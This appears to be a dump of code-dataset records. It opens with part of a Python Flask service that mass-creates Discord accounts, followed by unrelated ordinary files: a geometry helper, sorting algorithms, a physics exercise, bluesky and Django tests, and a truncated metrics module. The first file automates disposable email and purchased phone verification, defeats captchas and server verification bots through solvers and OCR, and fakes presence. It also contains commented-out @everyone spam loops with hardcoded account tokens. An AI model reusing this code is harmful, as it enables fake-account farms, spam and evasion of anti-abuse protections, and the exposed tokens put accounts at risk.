1\r\n break\r\n except :\r\n try :\r\n print(\"[token gen] fail to gen token | \" + str(textres))\r\n except:\r\n print(\"[token gen] fail to gen token | i think it's the proxy\")\r\n try:\r\n textres['captcha_key']\r\n break\r\n except:\r\n pass\r\n register_payload[\"email\"] = randomstr(randint(1, 6)) + randomint(randint(1, 5)) + \"@gmail.com\"\r\n \r\n \r\n if verify_mail :\r\n print(\"[mail] Waiting for mail...\")\r\n message=\"\"\r\n msg_id=\"\"\r\n while True 
:\r\n sleep(5)\r\n try :\r\n print(\"[mail] checking...\")\r\n message = get(\"https://api.mail.tm/messages\", headers=headers(mail_token, mail=True)).json()\r\n msg_id = message[\"hydra:member\"][0][\"id\"]\r\n print(\"[mail] I Got Mail\")\r\n break\r\n except :\r\n pass\r\n message = get(f\"https://api.mail.tm/messages/{msg_id}\", headers=headers(mail_token, mail=True)).json()[\"text\"]\r\n link = findall(r'(https?://\\S+)', message)[0]\r\n token_verify = get(link, headers=headers(discord_token)).url.partition(\"https://discord.com/verify#token=\")[2]\r\n \r\n verify_payload = {\"token\": token_verify, \"captcha_key\": get_captcha_code()}\r\n post(\"https://discord.com/api/v9/auth/verify\", headers=headers(discord_token, referrer=\"https://discord.com/verify\", fingerprint=fingerprint), json=verify_payload)\r\n print(\"[mail] Done\")\r\n \r\n if verify_phone :\r\n print(\"[token gen] wait for phone verify | \" + discord_token)\r\n sms_auth = {'Authorization':config['sms_key'],'Accept': 'application/json'}\r\n sms_res = get('https://5sim.net/v1/user/buy/activation/cambodia/any/discord',headers=sms_auth).json()\r\n sms_id = sms_res['id']\r\n sms_num = sms_res['phone']\r\n print(f\"[SMS] Got a number({sms_num})\")\r\n sleep(2.5)\r\n response = post('https://discord.com/api/v9/users/@me/phone', headers=headers(discord_token, fingerprint=fingerprint,useragent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54\",xsu=\"eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkxLjAuNDQ3Mi4xMTQgU2FmYXJpLzUzNy4zNiBFZGcvOTEuMC44NjQuNTQiLCJicm93c2VyX3ZlcnNpb24iOiI5MS4wLjQ0NzIuMTE0Iiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiJodHRwczovL2dpdmVhd2F5Ym90LnBhcnR5LyIsInJlZmVycmluZ19kb21haW4iOiJnaXZlYXdheWJvdC5wYXJ0eSIsInJlZmVycmVyX2N1cnJlbnQiOiIiLCJyZWZlcnJpbmdfZG9tYWluX2N1cnJlbnQiOiIiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo4ODI5NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=\"), json={\"phone\": sms_num})\r\n if response.status_code != 204:\r\n print(response.json()['message'])\r\n return False\r\n print(\"[SMS] Waiting for code...\")\r\n sleep(2.5)\r\n maxAttempts = 30\r\n attempts = 0\r\n while 1:\r\n if attempts >= maxAttempts:\r\n break\r\n sleep(10)\r\n print(\"[SMS] checking...\")\r\n response = get(f'https://5sim.net/v1/user/check/{sms_id}',headers=sms_auth).json()\r\n attempts += 1\r\n if response['sms'] != None:\r\n break\r\n \r\n if attempts >= maxAttempts:\r\n get(f'https://5sim.net/v1/user/ban/{sms_id}',headers=sms_auth)\r\n return False\r\n code = response['sms'][0]['code']\r\n print(f\"[SMS] Found code: {str(code)}.\")\r\n lastResponse = post('https://discord.com/api/v9/users/@me/phone/verify', headers=headers(discord_token, fingerprint=fingerprint,useragent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 
Edg/91.0.864.54\",xsu=\"eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkxLjAuNDQ3Mi4xMTQgU2FmYXJpLzUzNy4zNiBFZGcvOTEuMC44NjQuNTQiLCJicm93c2VyX3ZlcnNpb24iOiI5MS4wLjQ0NzIuMTE0Iiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiJodHRwczovL2dpdmVhd2F5Ym90LnBhcnR5LyIsInJlZmVycmluZ19kb21haW4iOiJnaXZlYXdheWJvdC5wYXJ0eSIsInJlZmVycmVyX2N1cnJlbnQiOiIiLCJyZWZlcnJpbmdfZG9tYWluX2N1cnJlbnQiOiIiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo4ODI5NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=\"), json={'code': code})\r\n if lastResponse.status_code == 204:\r\n get(f'https://5sim.net/v1/user/finish/{sms_id}',headers=sms_auth)\r\n print(\"[SMS] Done\")\r\n else:\r\n print(lastResponse.json()['message'])\r\n return False\r\n return discord_token\r\n \r\n#bypass zone\r\ndef bypass_aria(token, msg, chid, guild_id): # fix\r\n sendmsg(\"-ind\", chid, guild_id, token)\r\n for a in range(len(msg)): \r\n sleep(0.5)\r\n sendmsg(msg[a], chid, guild_id, token)\r\n sendmsg(\"Yes\", chid, guild_id, token)\r\n \r\ndef bypass_aria_verify(token, chid, guild_id): # fix\r\n from PIL import Image\r\n from pytesseract import pytesseract, image_to_string\r\n from io import BytesIO, StringIO\r\n from base64 import b64encode\r\n sendmsg(\"-verify\", chid, guild_id, token)\r\n sleep(5)\r\n pytesseract.tesseract_cmd = config['pytessereact']\r\n msgimg = get(f\"https://discord.com/api/v9/channels/{chid}/messages?limit=50\", headers=headers(token, referrer=f\"https://discord.com/channels/@me/{chid}\")).json()\r\n url = msgimg[0]['embeds'][0]['image']['url']\r\n imgraw = get(url, headers=headers(mail=True))\r\n base64_raw = b64encode(imgraw.content).decode(\"utf-8\")\r\n pic = StringIO()\r\n image_string = BytesIO(b64decode(base64_raw))\r\n image = Image.open(image_string)\r\n bg = Image.new(\"RGB\", image.size, (255,255,255))\r\n bg.paste(image,image)\r\n string = sub(r'\\W+', '', image_to_string(bg))\r\n sendmsg(string, chid, guild_id, token)\r\n\r\ndef bypass_server_cap(token, chid, guild_id): # fix\r\n from base64 import b64encode\r\n getchid = post(\"https://discord.com/api/v9/users/@me/channels\", json={\"recipients\":[\"512333785338216465\"]}, headers=headers(token)).json()\r\n msgimg = get(f\"https://discord.com/api/v9/channels/{getchid['id']}/messages?limit=50\", headers=headers(token, referrer=f\"https://discord.com/channels/@me/getchid['id']\")).json()\r\n print(msgimg[0]['embeds'][0]['image']['url'])\r\n imgraw = get(msgimg[0]['embeds'][0]['image']['url'], headers=headers())\r\n uri = (\"data:\" + imgraw.headers['Content-Type'] + \";\" + \"base64,\" + b64encode(imgraw.content).decode(\"utf-8\"))\r\n result = solver.normal(uri, hintText='same picture')\r\n print(result['code'])\r\n sendmsg(result['code'], chid, guild_id, token)\r\n return \"Done\"\r\n \r\n \r\ndef bypass_fortune_invite(token, invite): # fix \r\n from bs4 import BeautifulSoup\r\n session = Session()\r\n url = \"https://discord.com/api/v9/oauth2/authorize?client_id=618441438564188196&response_type=code&redirect_uri=https%3A%2F%2Fftune.app%2Flogin&scope=identify%20guilds%20guilds.join\"\r\n codeurl = session.post(url, json={\"permissions\":\"0\",\"authorize\":True}, headers=headers(token,useragent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 
Edg/91.0.864.54\",xsu=\"eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkxLjAuNDQ3Mi4xMTQgU2FmYXJpLzUzNy4zNiBFZGcvOTEuMC44NjQuNTQiLCJicm93c2VyX3ZlcnNpb24iOiI5MS4wLjQ0NzIuMTE0Iiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiJodHRwczovL2dpdmVhd2F5Ym90LnBhcnR5LyIsInJlZmVycmluZ19kb21haW4iOiJnaXZlYXdheWJvdC5wYXJ0eSIsInJlZmVycmVyX2N1cnJlbnQiOiIiLCJyZWZlcnJpbmdfZG9tYWluX2N1cnJlbnQiOiIiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo4ODI5NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=\", referrer=url)).json()\r\n print(codeurl['location'])\r\n session.get(codeurl['location'], headers=headers())\r\n htmltoken = session.get('https://ftune.app/?logged=true', headers=headers()).text\r\n soup = BeautifulSoup(htmltoken, \"html.parser\")\r\n s = str(soup.find_all('script')[0])\r\n print(htmltoken)\r\n s = s.split('\",\"')\r\n print(session.post(\"https://ftune.app/_go/\" + invite, headers=headers(s[-2])).text)\r\n\r\n '''\r\n while runn:\r\n sleep(heartbeat_interval/1000)\r\n try:\r\n ws.send(dumps({\"op\": 1,\"d\": None}))\r\n except Exception:\r\n break\r\n '''\r\n #return post(f\"http://127.0.0.1:8080/?token={token}&ch={ch_id}&guild={guild_id}\")\r\n\r\ndef online(token,name,livesteam,loop, chid=None, guild_id=None):\r\n global runn\r\n ws = WebSocket()\r\n ws.connect(\"wss://gateway.discord.gg/?v=8&encoding=json\")\r\n hello = loads(ws.recv())\r\n ws.send(dumps({\"op\": 2,\"d\": {\"token\": token,\"properties\": {\"$os\": \"windows\",\"$browser\": \"Discord\",\"$device\": \"desktop\"},\"presence\": {\"game\": {\"name\": name,\"type\": randint(0,3)},\"status\": choice(['online', 'dnd', 'idle']),\"since\": 0,\"afk\": False}}}))\r\n if livesteam:\r\n\r\n ws.send(dumps({\"op\": 4,\"d\": {\"guild_id\": guild_id,\"channel_id\": chid,\"self_mute\": True,\"self_deaf\": True}}))\r\n ws.send(dumps({\"op\": 18,\"d\": {\"type\": \"guild\",\"guild_id\": guild_id,\"channel_id\": chid,\"preferred_region\": \"singapore\"}}))\r\n if loop:\r\n heartbeat_interval = hello['d']['heartbeat_interval']\r\n while runn:\r\n sleep(heartbeat_interval/1000)\r\n try:\r\n ws.send(dumps({\"op\": 1,\"d\": None}))\r\n except Exception:\r\n break\r\n\r\ndef start(username,invite):\r\n token = token_gen(username,invite,ver_m, ver_p)\r\n if online_tf:\r\n online(token,online_msg,livesteam_tf,runn,livesteam_ch,livesteam_g)\r\n #for a in range(50):\r\n # sendmsg(\"@everyone\", \"870945232554954764\", \"870945229577019422\", token)\r\n\r\n@app.route(\"/gen\", methods=['POST'])\r\ndef api_gen():\r\n for aa in range(int(request.args['amount'])):\r\n executor.submit(start,request.args['username'],request.args['invite'])\r\n #start(request.args['username'],request.args['invite'])\r\n if aa > 500:\r\n print(\"[main] wait 5 sec\")\r\n sleep(5)\r\n sleep(0.01)\r\n print(f\"[main] Start Thread {aa}\")\r\n return \"true\"\r\n\r\n@app.route(\"/stats\", methods=['GET'])\r\ndef api_stats():\r\n try :\r\n return f\"{str(token_am)}|{str(get_bal())}\"\r\n except :\r\n return f\"ERROR|ERROR\",500\r\n\r\n@app.route(\"/update\", methods=['POST'])\r\ndef api_update():\r\n global ver_m,ver_p,online_tf,online_msg,livesteam_tf,livesteam_ch,livesteam_g,runn\r\n method = request.args['method']\r\n tf = request.args['tf']\r\n if method == \"l\":\r\n if tf == \"1\":\r\n livesteam_tf = True\r\n else :\r\n livesteam_tf = False\r\n aaa = 
request.args['msg'].split(\"|\")\r\n livesteam_ch = aaa[1]\r\n livesteam_g = aaa[0]\r\n elif method == \"o\":\r\n if tf == \"1\":\r\n online_tf = True\r\n else :\r\n online_tf = False\r\n online_msg = request.args['msg']\r\n return \"true\"\r\n\r\n@app.route(\"/\", methods=['GET'])\r\ndef index():\r\n return f\"{ver_m} {ver_p} {online_tf} {online_msg} {livesteam_tf} {livesteam_ch} {livesteam_g} {runn}\"\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='127.0.0.1',port=80)\r\n #asdasd = [\"ODc1MDIzMzE4MzEzNDkyNTIw.YRPfHA.pg4KFQ6IVrsWIIOJ5E6z4qqUl4I\",\"ODc1MDI2MjU4MzQ0NDExMTY2.YRPh2g.x2duBXL32Eb3Yt2bFeu8bHfKZJY\",\"ODc1MDI2NjU2NzU3MTY2MTkx.YRPiHw.QxNv6stl6iENxpk8xcRonrjBP9Y\"]\r\n #for aaaaa in range(10):\r\n # executor.submit(sendmsg,f\"@everyone {asciigen(1988)}\",\"875031605272522792\",\"870945229577019422\", \"ODc1MDIzMzE4MzEzNDkyNTIw.YRPfHA.pg4KFQ6IVrsWIIOJ5E6z4qqUl4I\")\r\n #sendmsg(\"@everyone\", \"870945232554954764\", \"870945229577019422\", asdasd)\r\n '''\r\n if empty():\r\n exit('capmonster balance empty')\r\n for aa in range(int(config['tokenc'])):\r\n aa +=1\r\n print(f'[main] start gen {aa}')\r\n #start()\r\n Thread(target=start).start()\r\n sleep(0.1)\r\n '''\r\n\r\n# token_gen() \r\n# bypass_fortune_invite(\"ODY2NDQ2MzY1MjIzNTUwOTc2.YPSrUQ.RR6ZMXO3LNwxdRTJ9DKu6vnd-YA\",\"aa\") #free\r\n# bypass_fortune_invite(\"\",\"\") #free\r\n\r\n# bypass_server_cap(\"\", \"\", \"\") #paid\r\n# bypass_aria(\"\", [\"a\",\"a\",\"a\"], \"\", \"\") #free\r\n# bypass_aria_verify(\"\",\"854917182172299274\", \"850027624918810624\") #free\r\n\r\n# livesteam(\"\", \"\", \"\") #freeonline(\"ODc1MDIzMzE4MzEzNDkyNTIw.YRPfHA.pg4KFQ6IVrsWIIOJ5E6z4qqUl4I\",\"a\",False,False)","sub_path":"czloed_Dhub_v2.py","file_name":"czloed_Dhub_v2.py","file_ext":"py","file_size_in_byte":19384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"133066947","text":"import numpy as np \n\ndef tlbr_occlution(tlbr1, tlbr2):\n \"\"\"(min x, min y, max x, max y)`, i.e.,\n `(top left, bottom right)`.\n\n -> calculate their overlap\n \"\"\"\n in_w=max(.0, min(tlbr2[2], tlbr1[2]) - max(tlbr1[0], tlbr2[0]))\n in_h=max(.0, min(tlbr1[3], tlbr2[3]) - max(tlbr1[1], tlbr2[1]))\n inter= in_w * in_h\n S_1= (tlbr1[3]-tlbr1[1])*(tlbr1[2]-tlbr1[0])\n S_2=(tlbr2[3]- tlbr2[1])*(tlbr2[2]-tlbr2[0])\n return (inter/S_1, inter/S_2)\n\n\nif __name__=='__main__':\n tlbr1=[0, 0, 7, 5]\n tlbr2=[3, 3, 9, 7]\n print(tlbr_occlution(tlbr1, tlbr2))\n #(0.22857142857142856, 0.3333333333333333)","sub_path":"src/lib/tracking_utils/calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"430625371","text":"#https://www.codewars.com/kata/simple-physics-problem/train/python\r\n\r\ndef solveit(vi, vf, t):\r\n a = (vf-vi)/t\r\n d = vi*t + 0.5*a*(t**2)\r\n a = round(a,2)\r\n d = round(d,2)\r\n \r\n if vi > vf:\r\n return []\r\n else:\r\n return [a,d]\r\n","sub_path":"SimplePhysics.py","file_name":"SimplePhysics.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"455817985","text":"class Query(object):\r\n statements = None\r\n order = None\r\n binds = None\r\n query = None\r\n select = None\r\n table = None\r\n \r\n def __init__(self,Model):\r\n from Lib.DAO.Dao import Dao\r\n self.statements = []\r\n self.binds = []\r\n self.order = []\r\n self.query = ''\r\n self.table = 
Dao.getTable(Model)\r\n \r\n def add(self,Statement):\r\n if Statement.__class__.__name__ == 'Order':\r\n self.order.append(Statement)\r\n else:\r\n self.statements.append(Statement)\r\n \r\n def prepare(self):\r\n if self.statements:\r\n for pos, S in enumerate(self.statements):\r\n S.prepare(self, pos)\r\n if self.order:\r\n for pos, O in enumerate(self.order):\r\n O.prepare(self,pos)\r\n self.select = \"SELECT * FROM {}\".format(self.table) \r\n ","sub_path":"obligatorio/boleteria/Lib/DAO/Strategy/Query.py","file_name":"Query.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"304031795","text":"import random\nfrom algolib.share.commons import less, exch\n\nclass Shuffle(object):\n \n '''\n Implements knuth shuffleing\n '''\n \n @classmethod\n def shuffle(cls, a):\n N = len(a)\n for i in xrange(N):\n r = random.randint(0, i)\n exch(a, i, r)\n\nclass Selection(object):\n \n @classmethod\n def sort(cls, a):\n N = len(a)\n for i in xrange(N):\n min = i\n for j in xrange(i + 1, N):\n if less(a[j], a[min]):\n min = j\n exch(a, i, min) \n\nclass Insertion(object):\n \n @classmethod\n def sort(cls, a):\n N = len(a)\n for i in xrange(0, N):\n for j in xrange(i, 0, -1): # i - 1 down to 0\n if less(a[j - 1], a[j]):\n break\n else:\n exch(a, j - 1, j)\n\n'''\n TODO : fix mergesort not to return a\n'''\nclass Mergesort(object):\n \n '''\n Mergesort using array slicing instead of separate index passing\n '''\n \n @classmethod\n def sort(cls, a):\n if len(a) == 1:\n return a\n else:\n mid = len(a) // 2 # integer division\n left = Mergesort.sort(a[ : mid])\n right = Mergesort.sort(a[mid : ])\n return Mergesort.__merge(left, right)\n \n @classmethod\n def __merge(cls, left, right):\n \n L = len(left)\n R = len(right)\n a = [None] * (L + R) # one way to create fixed sized (pre-allocate) array in python\n \n l = r = k = 0\n while((l < L) and (r < R)):\n if left[l] < right[r]:\n a[k] = left[l]\n l += 1\n elif left[l] > right[r]:\n a[k] = right[r]\n r += 1\n else:\n a[k] = left[l]\n k += 1\n l += 1\n a[k] = right[r]\n r += 1\n k += 1\n\n while(l < L):\n a[k] = left[l]\n l += 1\n k += 1\n \n while(r < R):\n a[k] = right[r]\n r += 1\n k += 1\n \n return a\n \nclass MergesortFix(object):\n \n @classmethod\n def sort(cls, a):\n aux = a[:]\n cls.__sort(a, aux, 0, len(a) - 1)\n \n @classmethod\n def __sort(cls, a, aux, low, high):\n if high > low: \n mid = (high - low) // 2 + low\n cls.__sort(a, aux, low, mid)\n cls.__sort(a, aux, mid + 1, high)\n cls.__merge(a, aux, low, mid, high)\n \n @classmethod\n def __merge(cls, a, aux, low, mid, high): \n # copy the current run into the auxiliary array before merging back\n for k in xrange(low, high + 1):\n aux[k] = a[k]\n i = low\n j = mid + 1\n for k in xrange(low, high + 1):\n if i > mid:\n a[k] = aux[j]\n j += 1\n elif j > high:\n a[k] = aux[i]\n i += 1\n elif cls.__less(aux[j], aux[i]):\n a[k] = aux[j]\n j += 1\n else:\n a[k] = aux[i]\n i += 1\n \n @classmethod\n def __less(cls, v, w):\n return v < w\n\n","sub_path":"sorting/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"47889540","text":"from bluesky.magics import BlueskyMagics\nimport bluesky.plans as bp\nfrom bluesky.examples import det, motor1, motor2, det1, det2, Mover\nfrom collections import OrderedDict\nimport os\nimport pytest\nimport signal\nfrom types import SimpleNamespace\n\n\nclass FakeIPython:\n def __init__(self, user_ns):\n self.user_ns = user_ns\n\n\ndef 
compare_msgs(actual, expected):\n for a, e in zip(actual, expected):\n # Strip off randomized stuff that cannot be compared.\n a.kwargs.pop('group', None)\n e.kwargs.pop('group', None)\n assert a == e\n\ndets = [det]\ndefault_dets = [det1, det2]\n\n@pytest.mark.parametrize('pln,magic,line', [\n (bp.mv(motor1, 2), 'mov', 'motor1 2'),\n (bp.mv(motor1, 2, motor2, 3), 'mov', 'motor1 2 motor2 3'),\n (bp.mvr(motor1, 2), 'movr', 'motor1 2'),\n (bp.mvr(motor1, 2, motor2, 3), 'movr', 'motor1 2 motor2 3'),\n (bp.count(dets), 'ct', 'dets'),\n (bp.count(default_dets), 'ct', ''),\n ])\ndef test_bluesky_magics(pln, line, magic, fresh_RE):\n RE = fresh_RE\n\n # Build a FakeIPython instance to use the magics with.\n\n dets = [det]\n ip = FakeIPython({'motor1': motor1, 'motor2': motor2, 'dets': dets})\n sm = BlueskyMagics(ip)\n sm.detectors = default_dets\n\n # Spy on all msgs processed by RE.\n msgs = []\n\n def collect(msg):\n msgs.append(msg)\n\n RE.msg_hook = collect\n sm.RE.msg_hook = collect\n\n # Test magics cause the RunEngine to execute the messages we expect.\n RE(bp.mv(motor1, 10, motor2, 10)) # ensure known initial state\n RE(pln)\n expected = msgs.copy()\n msgs.clear()\n RE(bp.mv(motor1, 10, motor2, 10)) # ensure known initial state\n getattr(sm, magic)(line)\n actual = msgs.copy()\n msgs.clear()\n compare_msgs(actual, expected)\n\n\n# The %wa magic doesn't use a RunEngine or a plan.\ndef test_wa():\n motor = Mover('motor', OrderedDict([('motor', lambda x: x),\n ('motor_setpoint', lambda x: x)]),\n {'x': 0})\n ip = FakeIPython({'motor': motor})\n sm = BlueskyMagics(ip)\n # Test an empty list.\n sm.wa('')\n\n sm.positioners.extend([motor])\n sm.wa('')\n\n # Make motor support more attributes.\n motor.limits = (-1, 1)\n sm.wa('')\n motor.user_offset = SimpleNamespace(get=lambda: 0)\n\n sm.wa('[motor]')\n\n\ndef test_magics_missing_ns_key(fresh_RE):\n RE = fresh_RE\n ip = FakeIPython({})\n sm = BlueskyMagics(ip)\n with pytest.raises(NameError):\n sm.mov('motor1 5')\n ip.user_ns['motor1'] = motor1\n sm.mov('motor1 5')\n\n\ndef test_interrupted(motor_det):\n motor, det = motor_det\n motor._fake_sleep = 10\n\n ip = FakeIPython({})\n sm = BlueskyMagics(ip)\n ip.user_ns['motor'] = motor\n\n pid = os.getpid()\n\n def sim_kill(n=1):\n for j in range(n):\n print('KILL')\n os.kill(pid, signal.SIGINT)\n\n motor.loop = sm.RE.loop\n sm.RE.loop.call_later(1, sim_kill, 2)\n sm.mov('motor 1')\n assert sm.RE.state == 'idle'\n","sub_path":"bluesky/tests/test_magics.py","file_name":"test_magics.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"492748837","text":"# get size of tree\r\nsize = int( input(\"Enter size of the pyramid: \"))\r\n\r\n# make stem - tree trunk\r\nstem = \" \" * (size - 1) + \"***\" \r\n\r\n# build tree\r\nfor i in range(size):\r\n\tif i % 4 == 3:\r\n\t\tprint (stem)\r\n\telse:\r\n\t\tprint (\" \" * (size - i) + \"*\" * (i + i + 1))\r\n\r\n# bottom of stem\r\nfor i in range(2):\r\n\tprint (stem)","sub_path":"star patterns/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"238661733","text":"from datetime import datetime\nfrom car_location.location.models.categoriaveiculo import CategoriaVeiculo\nfrom car_location.location.models.cliente import Cliente\nfrom car_location.location.models.devolucao import Devolucao\nfrom car_location.location.models.locacao import 
Locacao\nfrom car_location.location.models.veiculo import Veiculo\nfrom rest_framework import status\n\n__author__ = 'lucas'\nfrom django.shortcuts import resolve_url as r\nfrom rest_framework.test import APITestCase\n\n\nclass DevolucaoApiTests(APITestCase):\n def setUp(self):\n self.categoria = CategoriaVeiculo.objects.create(nome='Carro', tipo_cnh='B,C')\n self.veiculo = Veiculo.objects.create(modelo='Palio',\n categoria=self.categoria,\n quilometragem=55,\n disponivel=False)\n\n self.cliente = Cliente.objects.create(nome='lucas', cpf='12345678901',\n tipo_cnh='B', email='lucas@test.com',\n phone='719991625771')\n\n self.locacao = Locacao.objects.create(cliente=self.cliente,\n veiculo=self.veiculo,\n data_inicial='2015-01-23', data_final='2015-01-27',\n km_inicial=self.veiculo.quilometragem, valor=10)\n\n self.data = dict(locacao=self.locacao.pk, km_percorrido=10)\n\n def test_new_Devolucao(self):\n \"\"\"\n registering a return\n \"\"\"\n\n url = r('location:devolucao-list')\n response = self.client.post(url, self.data, format='json')\n with self.subTest():\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Devolucao.objects.count(), 1)\n self.assertEqual(Locacao.objects.get().devolvido, True)\n self.assertIsInstance(Devolucao.objects.get().data_entrega, datetime)\n self.assertEqual(Veiculo.objects.get().disponivel, True)\n\n def test_detail_devolucao(self):\n '''\n return detail\n '''\n\n self.obj = Devolucao.objects.create(locacao=self.locacao, km_percorrido=10)\n\n url = r('location:devolucao-detail', self.obj.pk)\n\n response = self.client.get(url, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n\n def test_delete_devolucao(self):\n \"\"\"\n removing a return\n\n \"\"\"\n self.obj = Devolucao.objects.create(locacao=self.locacao, km_percorrido=10)\n\n url = r('location:devolucao-detail', self.obj.pk)\n\n response = self.client.delete(url[1:])\n\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n\n","sub_path":"car_location/location/tests/test_api_devolucao.py","file_name":"test_api_devolucao.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"624516744","text":"from django.conf.urls import url, include\nfrom django.views.generic import FormView, TemplateView\n\nfrom polls import forms\nfrom polls import views\nfrom polls.rest import router\n\nurlpatterns = [\n url(r'^$', views.PollListView.as_view(), name='poll_home'),\n url(r'^rest/', include(router.urls), name='rest'),\n url(r'^about/', views.AboutView.as_view(vistor=\"Changbin\"), name='about'),\n url(r'^bootstrap3/', FormView.as_view(template_name='polls/bootstrap3.html', form_class=forms.MyRegistrationForm),\n name='bootstrap3'),\n url(r'^(?P<pk>\\d+)/$', views.DetailView.as_view(), name='detail'),\n url(r'^(?P<pk>\\d+)/results/$', views.ResultsView.as_view(), name='results'),\n url(r'^(?P<pk>\\d+)/vote/$', views.vote, name='vote'),\n url(r'^jinja2/$', TemplateView.as_view(template_name=\"polls/jinja.jinja2\"), {'words': 'Hello, Jinja2.'},\n name='jinja2', ),\n]\n","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"149006994","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport math\nimport os\nimport sys\nfrom functools import 
partial\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom trident.backend.common import get_session, addindent, get_time_suffix, get_class, get_function, camel2snake\nfrom trident.backend.pytorch_ops import *\nfrom trident.data.mask_common import mask2trimap\n\n__all__ = ['accuracy','recall','pixel_accuracy','alpha_pixel_accuracy','iou','psnr','mean_absolute_error','mean_squared_error','mean_squared_logarithmic_error','mae','mse','rmse','msle','get_metric']\n\n# def accuracy(input, target,axis=1):\n# input_tensor=input.clone().detach()\n# target_tensor=target.clone().detach()\n# if input_tensor.dtype!=torch.int64:\n# input_tensor=argmax(input_tensor,axis).squeeze()\n# if target_tensor.dtype!=torch.int64:\n# target_tensor=argmax(target_tensor,axis).squeeze()\n# if input_tensor.shape!=target_tensor.shape:\n# raise ValueError('input shape {0} is not competable with target shape {1}'.format(input_tensor.shape,target_tensor.shape))\n# else:\n# return input_tensor.eq(target_tensor).float().mean()\n\n\n\n\n\n\n@torch.no_grad()\ndef accuracy(output, target, topk=1,axis=1,ignore_index=-100, exclude_mask=False):\n \"\"\"Computes the precision@k for the specified values of k\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n \"\"\"\n input_tensor=output.copy().detach()\n target_tensor=target.copy().detach()\n num_classes = int_shape(output)[axis]\n if len(input_tensor)==0:\n return to_tensor(0.0)\n\n\n is_logsoftmax = None\n from_logits = None\n output_exp = exp(input_tensor)\n if (ndim(input_tensor) >= 1 and 'float' in str(input_tensor.dtype) and input_tensor.min() >= 0 and input_tensor.max() <= 1):\n is_logsoftmax = False\n from_logits = True\n input_tensor = clip(input_tensor, min=1e-8, max=1 - 1e-8)\n\n elif (ndim(output_exp) >= 1 and 'float' in str(output_exp.dtype) and output_exp.min() >= 0 and output_exp.max() <= 1):\n is_logsoftmax = True\n from_logits = True\n input_tensor = clip(output_exp, min=1e-8, max=1 - 1e-8)\n else:\n is_logsoftmax = False\n from_logits = False\n\n if input_tensor.dtype!=torch.int64 and topk==1:\n if 